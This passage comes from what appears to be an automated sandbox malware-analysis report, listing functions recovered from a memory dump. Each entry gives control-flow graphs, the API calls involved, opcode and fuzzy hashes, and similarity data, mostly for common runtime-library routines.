7ff6de52e578-7ff6de52e581 172->174 173->163 174->171
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 5fe27b08ee4b6b8f0378e8def081a4c84f0191f5120a80ca269d4310bc11da16
                                                                                                                                                                                                                              • Instruction ID: b49591bf042a4117316f5cb766f4a97a48bb748ec6024c6b75218e0b2543af22
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fe27b08ee4b6b8f0378e8def081a4c84f0191f5120a80ca269d4310bc11da16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BC1D222A1C68A41EA729F6594602BD7B90FBB1BC0F444133FA4E87791DE7EE8758740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE46F8B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 175 7ff6de46f8b0-7ff6de46f8dc 177 7ff6de46f8e2-7ff6de46f8f4 175->177 178 7ff6de46fbd0-7ff6de46fbe2 call 7ff6de460950 175->178 179 7ff6de46f8fa-7ff6de46f93f call 7ff6de46d090 177->179 180 7ff6de46fb0b-7ff6de46fb34 call 7ff6de46f4a0 177->180 186 7ff6de46fbe4-7ff6de46fbe8 178->186 188 7ff6de46f941-7ff6de46f958 179->188 189 7ff6de46f97f-7ff6de46f989 179->189 190 7ff6de46fb58-7ff6de46fb67 180->190 191 7ff6de46fb36-7ff6de46fb53 call 7ff6de460a70 180->191 197 7ff6de46f95a-7ff6de46f96b call 7ff6de46f1d0 188->197 198 7ff6de46f970-7ff6de46f975 188->198 193 7ff6de46f98b-7ff6de46f994 189->193 194 7ff6de46f996-7ff6de46f9a8 189->194 195 7ff6de46fb69-7ff6de46fba5 call 7ff6de471360 190->195 196 7ff6de46fba7-7ff6de46fbc3 call 7ff6de46f180 190->196 191->186 191->190 200 7ff6de46f9f7-7ff6de46fa07 193->200 201 7ff6de46f9aa-7ff6de46f9b3 194->201 202 7ff6de46f9b5-7ff6de46f9e8 call 7ff6de46f420 194->202 195->186 196->178 197->198 198->186 210 7ff6de46fa0d-7ff6de46fa24 200->210 211 7ff6de46fb09 200->211 206 7ff6de46f9ed-7ff6de46f9f2 201->206 202->206 206->200 213 7ff6de46fa3c-7ff6de46fa53 210->213 214 7ff6de46fa26-7ff6de46fa37 call 7ff6de46f1d0 210->214 211->190 216 7ff6de46fa55-7ff6de46fa5a 213->216 217 7ff6de46fa5f-7ff6de46fa6b 213->217 214->213 216->186 218 7ff6de46fa6d-7ff6de46fa7f call 7ff6de460950 217->218 219 7ff6de46fa81-7ff6de46fa85 217->219 224 7ff6de46faea-7ff6de46faff call 7ff6de46d290 218->224 221 7ff6de46faa8-7ff6de46faba 219->221 222 7ff6de46fa87-7ff6de46faa6 219->222 221->224 225 7ff6de46fabc-7ff6de46fad4 221->225 222->224 230 7ff6de46fb04 224->230 226 7ff6de46fad8-7ff6de46fae5 call 7ff6de460950 225->226 227 7ff6de46fad6 225->227 226->224 227->224 227->226 230->186 230->211
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strrchr
                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                              • API String ID: 3418686817-2564639436
                                                                                                                                                                                                                              • Opcode ID: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                                                                                                                                                                                              • Instruction ID: 920f14aac18e7a6b07b13e4f4ca46401197dd080db8e7a7fe7eecd573441e035
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3911E2661CB8681DA608F15E4503AEA761FBD5BA0F104237EAED87BE9DF3CD4548B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE529BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: String$try_get_function
                                                                                                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                                                                                                              • API String ID: 1203122356-3893581201
                                                                                                                                                                                                                              • Opcode ID: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                                                                                                                                                                                              • Instruction ID: 1edb54de07d394144709b4c514191f8c9ee3c04218e22c93aba7f0caf28d1e5b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E011FC35A0CB8586D760CB56B4902AAB7A4F7E9BD0F144136EACD93B59CF3CD5608B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE476950 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressCallerLibraryLoadProc
                                                                                                                                                                                                                              • String ID: SystemFunction036$advapi32.dll
                                                                                                                                                                                                                              • API String ID: 4215043672-1354007664
                                                                                                                                                                                                                              • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                                                                              • Instruction ID: beb7a90d31f3e2c08f393e8154e41576e0a5fbfd2c3ee7cdd2b6b5f9b14e5aa3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C110062D1D64782FB60AB20E95433E23A1BBA43A0F904577F58EC6694DF2DD87887C1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4DF000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF6DE4DEDD3), ref: 00007FF6DE4DF013
                                                                                                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,?,?,?,?,?,00007FF6DE4DEDD3), ref: 00007FF6DE4DF034
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DE4A17E7), ref: 00007FF6DE4DF061
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE4DEE80: GetLastError.KERNEL32 ref: 00007FF6DE4DEE96
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE4DEE80: FormatMessageA.KERNEL32 ref: 00007FF6DE4DEECA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$FormatLibraryLoadMessage
                                                                                                                                                                                                                              • String ID: cannot load module '%s': %s
                                                                                                                                                                                                                              • API String ID: 3853237079-2554058836
                                                                                                                                                                                                                              • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                                                                              • Instruction ID: 73b18b9059020b022925f200f84245066bd4a4b4a8c26c02b4a9bf263fa2c49b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16F0F636918A8682D720DB15F45421EB770FBD97D4F500136FA8D83A28CE3DD1648B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4FD4E4 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452418845-0
                                                                                                                                                                                                                              • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                                                                              • Instruction ID: e14910e82ffd07b5f69816f2b93e0af2c815b9b0c26fa4d6a4ff0c8e541e889e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75316D20E0D64746FB25AB6494213BD23919FB5B89F44543BF94ECB2D3DE6EF4248301
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE478C90 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$QueryVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3696288210-0
                                                                                                                                                                                                                              • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                                                                              • Instruction ID: ce993d2d62e1eb4aa9bd7ee916f2e6b1d55fa6605562fe44d09393e39d86c957
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF21D631E1DF5582EA709B15E44022E67A4FBAC7D5F500636F69D82BB4DF3CD5608B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE46FD90 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 333 7ff6de46fd90-7ff6de46fdb6 334 7ff6de46fdb8-7ff6de46fdc8 333->334 335 7ff6de46fdd0-7ff6de46fde2 333->335 334->335 336 7ff6de46fe3c-7ff6de46fe4f 335->336 337 7ff6de46fde4-7ff6de46fdf6 335->337 339 7ff6de47004b-7ff6de470067 336->339 340 7ff6de46fe55-7ff6de46fe68 336->340 337->336 338 7ff6de46fdf8-7ff6de46fdfd 337->338 343 7ff6de46fe03-7ff6de46fe15 338->343 344 7ff6de46feb0-7ff6de46fee0 call 7ff6de46f4a0 338->344 341 7ff6de47008a-7ff6de47008f 339->341 342 7ff6de470069-7ff6de470085 339->342 340->339 345 7ff6de46fe6e-7ff6de46fe73 340->345 348 7ff6de4700fb 341->348 349 7ff6de470091-7ff6de4700a0 341->349 347 7ff6de47010b-7ff6de47010f 342->347 343->344 350 7ff6de46fe1b-7ff6de46fe3a 343->350 357 7ff6de46ff78-7ff6de470000 call 7ff6de46f180 * 3 344->357 358 7ff6de46fee6-7ff6de46ff0f call 7ff6de46f4a0 344->358 345->344 351 7ff6de46fe75-7ff6de46fe88 345->351 355 7ff6de470114-7ff6de470131 347->355 354 7ff6de470103-7ff6de470107 348->354 349->348 353 7ff6de4700a2-7ff6de4700be 349->353 350->336 350->344 351->344 356 7ff6de46fe8a-7ff6de46feaa 351->356 353->348 359 7ff6de4700c0-7ff6de4700f9 353->359 354->347 360 7ff6de470154-7ff6de470159 355->360 361 7ff6de470133-7ff6de47014f 355->361 356->339 356->344 391 7ff6de470035-7ff6de470041 357->391 392 7ff6de470002-7ff6de47002d 357->392 358->357 374 7ff6de46ff11-7ff6de46ff24 358->374 359->354 363 7ff6de47015b-7ff6de47016a 360->363 364 7ff6de4701c5 360->364 362 7ff6de4701d5-7ff6de470201 361->362 370 7ff6de470203-7ff6de470213 362->370 371 7ff6de47022f-7ff6de470238 362->371 363->364 367 7ff6de47016c-7ff6de470188 363->367 368 7ff6de4701cd-7ff6de4701d1 364->368 367->364 373 7ff6de47018a-7ff6de4701c3 367->373 368->362 370->355 375 7ff6de470219-7ff6de470229 370->375 376 7ff6de47024c-7ff6de4702a0 call 7ff6de46f250 call 7ff6de46f2a0 371->376 377 7ff6de47023a-7ff6de470247 call 7ff6de460950 371->377 373->368 380 7ff6de46ff3b-7ff6de46ff47 374->380 381 7ff6de46ff26-7ff6de46ff39 374->381 375->355 375->371 396 7ff6de4703b6-7ff6de4703c3 call 7ff6de46f2f0 376->396 397 7ff6de4702a6-7ff6de4702b5 376->397 377->376 385 7ff6de46ff4f-7ff6de46ff73 call 7ff6de460a70 380->385 381->380 381->385 395 7ff6de470467-7ff6de47046e 385->395 391->395 392->391 402 7ff6de4703c8-7ff6de4703d3 396->402 398 7ff6de4702fd-7ff6de470302 397->398 399 7ff6de4702b7-7ff6de4702f8 call 7ff6de48e9c0 397->399 403 7ff6de47037d-7ff6de470381 398->403 404 7ff6de470304-7ff6de470313 398->404 412 7ff6de4703b1 399->412 406 7ff6de4703e0-7ff6de4703e8 402->406 407 7ff6de4703db call 7ff6de46f120 402->407 409 7ff6de470396-7ff6de4703ac call 7ff6de4a2fe0 403->409 410 7ff6de470383-7ff6de470394 call 7ff6de481a40 403->410 404->403 408 7ff6de470315-7ff6de470331 404->408 406->335 415 7ff6de4703ee-7ff6de47040e 406->415 407->406 408->403 413 7ff6de470333-7ff6de47037b call 7ff6de48e9c0 408->413 409->412 410->412 413->412 416 7ff6de470465 415->416 417 7ff6de470410-7ff6de470415 415->417 416->395 420 7ff6de470458-7ff6de470460 call 7ff6de468660 417->420 421 7ff6de470417-7ff6de470454 417->421 420->416 421->420
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                              • Opcode ID: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                                                                                                                                                                                              • Instruction ID: 9e6e8f76b490c4d4a638d1c363b0ea263c0607732f8c247ea021758ea1ba8725
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A022436A19B8685DB709B19D48026E77A0F7D9BB4F104336EAAD877E5CF3CD4508B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4630A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                                              • API String ID: 1452528299-2967466578
                                                                                                                                                                                                                              • Opcode ID: 888c02a4af715df60f1a7dd258da0cc1fa8a9f94b01bbf0f875320e646443852
                                                                                                                                                                                                                              • Instruction ID: bd376641051bd883893ad0b141ca2ba31c6534dbd59141689fc630fa530f833f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 888c02a4af715df60f1a7dd258da0cc1fa8a9f94b01bbf0f875320e646443852
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D51CC72A18B85C6DA61CB19E49026DB7B0F7D8BA4F100236FAAD877A4DF3CD451CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51AD1C Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                                                                              • Instruction ID: c56a0c512ef567cf4872f871a8d5363beeca2728010faf25704840d2a736b512
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
